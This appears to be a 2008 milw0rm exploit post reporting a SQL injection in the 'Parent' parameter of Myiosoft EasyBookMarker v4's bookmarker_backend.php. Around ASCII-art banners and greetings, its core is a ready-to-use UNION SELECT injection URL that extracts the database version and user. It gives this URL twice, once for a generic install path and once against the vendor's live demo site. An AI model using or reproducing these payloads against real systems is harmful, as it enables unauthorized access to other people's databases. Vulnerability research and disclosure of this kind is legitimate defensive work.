============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability ============================================================================== [»] Script: [ Myiosoft EasyBookMarker ] [»] Language: [ PHP ] [»] Website: [ http://myiosoft.com/?1.4.0.0 ] [»] Type: [ Commercial ] [»] Report-Date: [ 07.11.2008 ] [»] Founder: [ G4N0K ] ===[ XPL ]=== [»] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5-- ===[ LIVE ]=== [»] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5-- ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 [»] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); //EoX =============================================================================== # milw0rm.com [2008-11-07]